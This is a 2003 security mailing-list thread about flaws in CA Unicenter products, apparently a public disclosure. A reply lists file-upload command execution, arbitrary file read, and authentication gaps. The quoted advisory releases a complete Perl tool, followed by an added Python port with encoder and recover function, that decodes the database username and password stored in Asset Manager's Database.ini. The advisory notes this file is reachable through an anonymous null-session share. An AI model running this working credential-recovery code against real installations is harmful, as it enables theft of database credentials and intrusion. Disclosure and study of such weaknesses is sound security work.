Hello Tor, all

While you're at it, you might want to take a look at this. I came across these vulnerabilities while doing a superficial review of CA's TNG Unicenter. Not sure if some of these may affect "Asset Manager" or not.

<quote>
#1. Remote command execution via file upload ( http://machine/scripts/file_upload.pl )

#2. A helpdesk user with no special access rights can read any file on the system where the Service desk daemon has access (by default Local/SYSTEM). pdmcgi.exe accepts "templates" as a parameter without further security checks regarding what type of files can be used as "templates".

#3. pdm_cgireport.exe allows creating and browsing any report without prior authentication.

#4. A normal user, who is configured to see only his requests, is able to see all requests by manipulating pdmcgi.exe queries.
</quote>

AFAIK, all these issues have been fixed, but I have no clue if the fixes are public or not. You should contact CA if you feel you might be vulnerable.

Best regards,
Joao Gouveia
------------
tharbad@kaotik.org

On Wed, 2003-06-04 at 16:27, Tor Houghton wrote:
> List,
>
> The following can also be found at:
>
> http://www.kufumo.com/releases/ca-passwordrecover.txt
>
> Thanks,
>
> Tor Houghton
>
> ;
>
> $Id: ca-passwordrecover.txt,v 1.3 2003/05/20 10:46:51 torh Exp $
>
> Computer Associates "Asset Manager" Password Recovery Tool
>
> (c) 2003 Tor Houghton (th at kufumo dot com)
>
>
> ++Synopsis++
>
> The Computer Associates' Unicenter Asset Manager(TM) software uses a stored
> secret in order to decrypt stored passwords. Attached to this text is a tool
> to decrypt these passwords.
>
>
> ++What++
>
> (http://www3.ca.com/Solutions/Collateral.asp?CID=33237&ID=194)
>
> Simply put, it is a data collector with extended privileges. It is comprised
> of an "Engine" (and a database), one or more "Sectors", a "Console" and an
> "Agent" for each device (Windows or UNIX) that is to be added to the asset
> database (see fig 1).
>
> [Console]                      +-------- [Agent]
>     |                          |
>     v                          v
> [Database] <-- [Engine] --> [Sector] <-- [Agent]
>                    |
>                    +------> [Sector] <-- [Agent]
>                                ^
>                                |
>                                +-------- [Agent]
>
> (figure 1)
>
> The arrows do not depict data flow, but transaction flow. For example, the
> Agents do get data from the Sector (and deliver data to it), but the Agent
> initiates this transaction.
>
> The Engine issues jobs and collects results (both stored on the Sector) and
> the Agent executes these.
>
> On the whole, this looks like a nice design; you could easily firewall the
> Engine, Console and Database from the rest of the network, for example.
> However, the Sector is (by default) a NULLSESSION share, writable by anyone.
>
> Anyway. This document is not about whether or not it is possible to compromise
> any machine with an Agent on it through a Sector, but to release a password
> recovery tool.
>
> Here it is.
>
> --
>
> #!/usr/bin/perl
> $version='ca-dbpwrecover 1.2 2003/03/19';
> ##
> ## (c) th at kufumo.com 2003
> ##
> ## this version was based on AMO Unicenter 3.2
> ##
> ## thanks to emf at kufumo.com and ssw at kufumo.com for help with the
> ## disassembly and helping to reverse the encoding algorithm! go daddy!
> ##
> ## can't find a suitable file?
> ##
> ## (a default installation has the file 'Database.ini' available via a
> ## nullsession share ("amdomain$") on the machine running the console/
> ## engine.)
> ##
> ##
> $|=1;
> ##
>
> $ironic_seed="NetCon"; ## we predict $ironic_seed will change
>                        ## in the next version of CA AMO etc.
>
> $CRYPT="BP7xCtDQqA2EZWoFH6wSIJeMzdYLb9Vfm5uNO4cKRGT3kUX018apyghijlnrsv";
> $CLEAR="ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz";
>
> use Getopt::Long;
>
> GetOptions("h",
>            "u=s" => \$uname,
>            "p=s" => \$pword,
>            "f=s" => \$file);
>
> if($opt_h) {
>     print <<EOM;
> $version (c) 2003 th at kufumo.com
> usage: ca-dbpwrecover [-h] [-u <username>] [-p <passwd>] [-f <file>]
>   -h : this
>   -p : password (if not using files)
>   -u : username (if not using files)
>   -f : filename (e.g. 'ca-dbpwrecover -f Database.ini')
> EOM
>     exit(1);
> }
>
> if($file) {
>     DecryptCAEncryption("","",$file);
> } else {
>     if($pword && $uname) {
>         DecryptCAEncryption($pword,$uname,"");
>         exit(0);
>     } else {
>         print "Not enough parameters. Try -h.\n";
>         exit(1);
>     }
> }
>
> exit();
>
> sub DecryptCAEncryption {
>     my($pword,$uname,$file)=@_;
>
>     my($u,$c,$oa,$ob,$offset);
>
>     my(@crypt)=split(//,$CRYPT);
>
>     ## with -f, the encoded values are read from the ini file and
>     ## override anything given on the command line
>     if($file) {
>         open(IN,$file) || die "error: failed to open $file: $!\n";
>         while(<IN>) {
>             if(/^UserName=\#(\S+)\s*$/) {$name=$1;}
>             if(/^Password=\#(\S+)\s*$/) {$pass=$1;}
>         }
>         close(IN);
>     }
>
>     $uname=$name if($name);
>     $pword=$pass if($pass);
>
>     @pass=split(//,$pword);
>     @user=split(//,$uname);
>
>     ## the username is decoded against the fixed seed "NetCon"
>     @nc=split(//,$ironic_seed);
>
>     print "Username: ";
>
>     $c=5;
>     for($u=0;$u<@user;$u++) {
>
>         ## find occurrence of current char ($user[$u]) in cleartext
>         ## keystring:
>
>         $_=$CLEAR;
>
>         while(m/$user[$u]/g) {
>             $oa=pos;
>         }
>
>         $oa++;
>
>         if($u<@nc) {
>             $_=$CRYPT;
>             while(m/$nc[$u]/g) {
>                 $ob=pos;
>             }
>             $ob++;
>             $oa=$oa+($ob*-1);
>         } else {
>             $oa=$oa-$u+$c;
>             $c++;
>         }
>
>         while($oa<0) {
>             $oa=$oa+62;
>         }
>         while($oa>62) {
>             $oa=$oa-62;
>         }
>
>         $oa--;
>
>         push(@clear,$crypt[$oa-1-$u]);
>
>     }
>
>     foreach(@clear) {
>         print $_;
>     }
>
>     print "\n";
>
>     ## who said reuse of code is a good thing?
>     ## i think i failed class here. heck, did you want the tool or not?
>     ##
>
>     ## the password is decoded the same way, but against the username
>     ## just recovered instead of the seed
>     print "Password: ";
>
>     $c=@clear;
>
>     for($u=0;$u<@pass;$u++) {
>
>         ## find occurrence of current char ($pass[$u]) in cleartext
>         ## keystring:
>
>         $_=$CLEAR;
>
>         while(m/$pass[$u]/g) {
>             $oa=pos;
>         }
>         $oa++;
>
>         if($u<@clear) {
>             $_=$CRYPT;
>             while(m/$clear[$u]/g) {
>                 $ob=pos;
>             }
>             $ob++;
>             $oa=$oa+($ob*-1);
>         } else {
>             $oa=$oa-$u+$c-1;
>             $c++;
>         }
>
>         while($oa<0) {
>             $oa=$oa+62;
>         }
>         while($oa>62) {
>             $oa=$oa-62;
>         }
>
>         $oa--;
>
>         push(@cpass,$crypt[$oa-1-$u]);
>
>     }
>
>     foreach(@cpass) {
>         print $_;
>     }
>
>     print "\n";
>
> }
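As an added illustration (not part of Tor's tool or of this thread), the same per-character step ported to Python with its inverse derived from it, which makes the weakness explicit: each stored character is a fixed 62-symbol substitution shifted by its position and by a "key" character, and that key is the constant "NetCon" for the username and the recovered username for the password, so nothing secret is involved. The encode() function and the Database.ini contents are constructed here (encode() inverts the decoder above; it is not CA's code).

```python
import re

CRYPT = "BP7xCtDQqA2EZWoFH6wSIJeMzdYLb9Vfm5uNO4cKRGT3kUX018apyghijlnrsv"
CLEAR = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz"
SEED = "NetCon"  # the fixed $ironic_seed from the Perl tool


def decode(encoded, key):
    """Port of one character step of DecryptCAEncryption: stored char i is
    looked up in CLEAR, shifted back by the position of key[i] in CRYPT
    (while the key lasts) and by i itself, and read out of CRYPT. Modular
    indexing replaces Perl's negative-index wrap; identical for values of
    up to 60 characters."""
    out = []
    for i, ch in enumerate(encoded):
        pos = CLEAR.index(ch)
        if i < len(key):
            pos -= CRYPT.index(key[i]) + 1
        pos -= 1 + i
        out.append(CRYPT[pos % 62])
    return "".join(out)


def encode(plain, key):
    """Inverse of decode(), derived here from the decoder (assumed, not
    taken from CA's code). It shows the scheme is a fixed, keyless and
    fully reversible substitution rather than encryption."""
    out = []
    for i, ch in enumerate(plain):
        pos = CRYPT.index(ch) + 1 + i
        if i < len(key):
            pos += CRYPT.index(key[i]) + 1
        out.append(CLEAR[pos % 62])
    return "".join(out)


def recover(ini_text):
    """Pull out the UserName=#... / Password=#... lines as the Perl does and
    decode them: username under SEED, password under the recovered
    username (an autokey). No secret outside the program is needed."""
    name = re.search(r"^UserName=#(\S+)\s*$", ini_text, re.M)
    pw = re.search(r"^Password=#(\S+)\s*$", ini_text, re.M)
    user = decode(name.group(1), SEED) if name else ""
    return user, (decode(pw.group(1), user) if pw else "")


# Constructed sample made with encode() above, not from a real Database.ini.
SAMPLE_INI = "[Database]\nUserName=#%s\nPassword=#%s\n" % (
    encode("amoadmin", SEED), encode("Winter2003", "amoadmin"))
```

Because the only "key material" is the hardcoded seed and the file itself, the defensive takeaway is that credentials in a Database.ini reachable over a null-session share should be treated as plaintext and rotated.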